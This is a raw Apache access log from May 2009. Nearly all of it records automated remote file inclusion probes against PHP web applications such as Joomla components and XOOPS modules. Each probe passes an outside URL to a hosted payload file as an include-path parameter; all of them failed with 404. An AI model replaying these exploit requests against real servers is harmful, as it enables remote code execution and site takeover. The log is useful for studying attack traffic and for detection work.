203.151.233.72 - - [29/May/2009:22:04:23 -0500] "GET /logs/errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
203.151.233.72 - - [29/May/2009:22:04:24 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
203.151.233.72 - - [29/May/2009:22:05:18 -0500] "GET /logs/errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
203.151.233.72 - - [29/May/2009:22:05:18 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
203.151.233.72 - - [29/May/2009:22:05:18 -0500] "GET /errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:22:06:07 -0500] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:22:06:07 -0500] "GET /logs/access_log.1235260800//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:22:06:07 -0500] "GET //components/com_jombib/BibTex.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:06:19 -0500] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:06:19 -0500] "GET //components/com_jombib/BibTex.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:06:19 -0500] "GET /logs/access_log.1235260800//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:06:24 -0500] "GET //components/com_jombib/BibTex.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:06:24 -0500] "GET /logs/access_log.1235260800//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:06:24 -0500] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:06:26 -0500] "GET //components/com_jombib/BibTex.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:06:26 -0500] "GET /logs/access_log.1235260800//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:06:26 -0500] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
112.175.141.41 - - [29/May/2009:22:06:29 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
112.175.141.41 - - [29/May/2009:22:06:29 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
112.175.141.41 - - [29/May/2009:22:06:29 -0500] "GET /logs/access_log.1242518400/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
112.175.141.41 - - [29/May/2009:22:06:29 -0500] "GET /logs/access_log.1238716800/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
65.55.106.146 - - [29/May/2009:22:06:40 -0500] "GET /logs/access_log.1218672000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.181.7.97 - - [29/May/2009:22:07:18 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.151.233.72 - - [29/May/2009:22:09:39 -0500] "GET /logs/access_log.1241136000/errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
187.40.97.189 - - [29/May/2009:22:09:56 -0500] "GET /logs/access_log.1241654400com_user&view=reset&layout=confirm HTTP/1.1" 404 351 "-""Mozilla/3.0 (compatible; Indy Library)"
74.208.111.178 - - [29/May/2009:22:10:22 -0500] "GET /logs/errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.208.111.178 - - [29/May/2009:22:10:22 -0500] "GET /errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
74.208.111.178 - - [29/May/2009:22:10:22 -0500] "GET /logs/access_log.1235260800/errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:10:41 -0500] "GET //include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:22:10:41 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:22:10:41 -0500] "GET /logs/access_log.1229904000//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
65.98.80.2 - - [29/May/2009:22:10:42 -0500] "GET /logs//contenido/backend_search.php?contenido_path=http://www.hohewart.de/milw0rm-fukung.txt%0D?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
65.98.80.2 - - [29/May/2009:22:10:42 -0500] "GET //contenido/backend_search.php?contenido_path=http://www.hohewart.de/milw0rm-fukung.txt%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
85.17.162.28 - - [29/May/2009:22:10:45 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:22:10:54 -0500] "GET /logs/access_log.1229904000//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:22:10:54 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:22:10:54 -0500] "GET //include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:22:11:04 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
69.50.197.106 - - [29/May/2009:22:11:51 -0500] "GET /errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.50.197.106 - - [29/May/2009:22:11:51 -0500] "GET /logs/errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.50.197.106 - - [29/May/2009:22:11:51 -0500] "GET /logs/access_log.1235260800/errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.50.197.106 - - [29/May/2009:22:12:19 -0500] "GET /errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.50.197.106 - - [29/May/2009:22:12:19 -0500] "GET /logs/errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.50.197.106 - - [29/May/2009:22:12:19 -0500] "GET /logs/access_log.1235260800/errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.150.52.114 - - [29/May/2009:22:15:05 -0500] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
212.150.52.114 - - [29/May/2009:22:15:05 -0500] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.150.52.114 - - [29/May/2009:22:15:05 -0500] "GET /logs/access_log.1242172800//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
212.150.52.114 - - [29/May/2009:22:15:44 -0500] "GET /logs/access_log.1242432000//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:16:07 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:22:16:08 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:22:16:23 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:22:16:23 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
74.52.2.130 - - [29/May/2009:22:16:42 -0500] "GET /logs//components/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
74.52.2.130 - - [29/May/2009:22:16:42 -0500] "GET //components/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
213.203.223.93 - - [29/May/2009:22:18:00 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [29/May/2009:22:18:00 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [29/May/2009:22:18:00 -0500] "GET /logs/access_log.1240704000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [29/May/2009:22:19:15 -0500] "GET /logs/access_log.1240790400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
67.212.165.114 - - [29/May/2009:22:20:51 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:22:20:51 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:22:20:51 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:21:58 -0500] "GET /logs/access_log.1233187200//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:22:21:59 -0500] "GET /logs/access_log.1231372800//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:22:22:16 -0500] "GET /logs/access_log.1231372800//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:22:22:16 -0500] "GET /logs/access_log.1233187200//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
89.234.63.110 - - [29/May/2009:22:22:22 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://e-cardonline.co.kr/excel/test.txt?? HTTP/1.1" 404 327 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
85.17.162.28 - - [29/May/2009:22:22:23 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:22:23 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:22:23 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:23:18 -0500] "GET /logs/access_log.1236816000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:23:34 -0500] "GET /logs/access_log.1239408000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.234.100.126 - - [29/May/2009:22:24:07 -0500] "GET /logs/access_log.1240876800//show_image_in_imgtag.php?mosConfig_absolute_path=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.234.100.126 - - [29/May/2009:22:24:07 -0500] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.234.100.126 - - [29/May/2009:22:24:07 -0500] "GET /logs/access_log.1242086400//show_image_in_imgtag.php?mosConfig_absolute_path=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.234.100.126 - - [29/May/2009:22:24:07 -0500] "GET //show_image_in_imgtag.php?mosConfig_absolute_path=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:24:11 -0500] "GET /logs/access_log.1238112000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.234.100.126 - - [29/May/2009:22:24:25 -0500] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.234.100.126 - - [29/May/2009:22:24:25 -0500] "GET //show_image_in_imgtag.php?mosConfig_absolute_path=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:22:24:43 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
200.142.148.142 - - [29/May/2009:22:24:43 -0500] "GET /logs//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
200.142.148.142 - - [29/May/2009:22:24:43 -0500] "GET /logs/access_log.1236470400//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
211.234.100.126 - - [29/May/2009:22:24:48 -0500] "GET /logs/access_log.1240876800//show_image_in_imgtag.php?mosConfig_absolute_path=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.234.100.126 - - [29/May/2009:22:24:48 -0500] "GET /logs/access_log.1242086400//show_image_in_imgtag.php?mosConfig_absolute_path=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.217.216.86 - - [29/May/2009:22:24:49 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 354 "-""libwww-perl/5.826"
124.217.216.86 - - [29/May/2009:22:24:50 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.826"
85.17.162.28 - - [29/May/2009:22:24:54 -0500] "GET /logs/access_log.1242259200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:24:59 -0500] "GET /logs/access_log.1242086400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:25:01 -0500] "GET /logs/access_log.1242432000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
67.15.14.89 - - [29/May/2009:22:25:03 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
67.15.14.89 - - [29/May/2009:22:25:03 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
85.17.162.28 - - [29/May/2009:22:25:04 -0500] "GET /logs/access_log.1241654400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:25:11 -0500] "GET /logs/access_log.1238889600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:25:11 -0500] "GET /logs/access_log.1239667200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:25:24 -0500] "GET /logs/access_log.1242172800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:25:34 -0500] "GET /logs/access_log.1237248000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:25:45 -0500] "GET /logs/access_log.1236384000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:25:53 -0500] "GET /logs/access_log.1238198400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:26:00 -0500] "GET /logs/access_log.1239148800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:26:02 -0500] "GET /logs/access_log.1233964800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:26:11 -0500] "GET /logs/access_log.1234483200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:26:17 -0500] "GET /logs/access_log.1239494400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:26:18 -0500] "GET /logs/access_log.1236211200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:26:19 -0500] "GET /logs/access_log.1235952000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:26:25 -0500] "GET /logs/access_log.1237507200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:26:30 -0500] "GET /logs/access_log.1240876800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:26:30 -0500] "GET /logs/access_log.1236470400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:26:33 -0500] "GET /logs/access_log.1236902400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:22:26:35 -0500] "GET /logs/access_log.1237680000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
121.130.29.11 - - [29/May/2009:22:28:14 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
121.130.29.11 - - [29/May/2009:22:28:14 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
121.130.29.11 - - [29/May/2009:22:28:14 -0500] "GET /logs/access_log.1228867200//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.246.20.221 - - [29/May/2009:22:28:39 -0500] "GET /logs//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.246.20.221 - - [29/May/2009:22:28:39 -0500] "GET /logs/access_log.1236470400//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
67.15.14.89 - - [29/May/2009:22:29:06 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.nw.or.kr/bbs/icon/idz.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
67.15.14.89 - - [29/May/2009:22:29:06 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.nw.or.kr/bbs/icon/idz.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
218.27.203.107 - - [29/May/2009:22:29:52 -0500] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.bungeholes.com/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.27.203.107 - - [29/May/2009:22:29:52 -0500] "GET /logs/access_log.1242172800//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.bungeholes.com/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
218.27.203.107 - - [29/May/2009:22:29:53 -0500] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.bungeholes.com/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.27.203.107 - - [29/May/2009:22:30:08 -0500] "GET /logs/access_log.1242432000//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.bungeholes.com/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
80.237.146.58 - - [29/May/2009:22:30:12 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.nw.or.kr/bbs/icon/bajoid.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.76"
80.237.146.58 - - [29/May/2009:22:30:12 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.nw.or.kr/bbs/icon/bajoid.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.76"
216.221.10.116 - - [29/May/2009:22:32:46 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:22:32:46 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:22:32:46 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
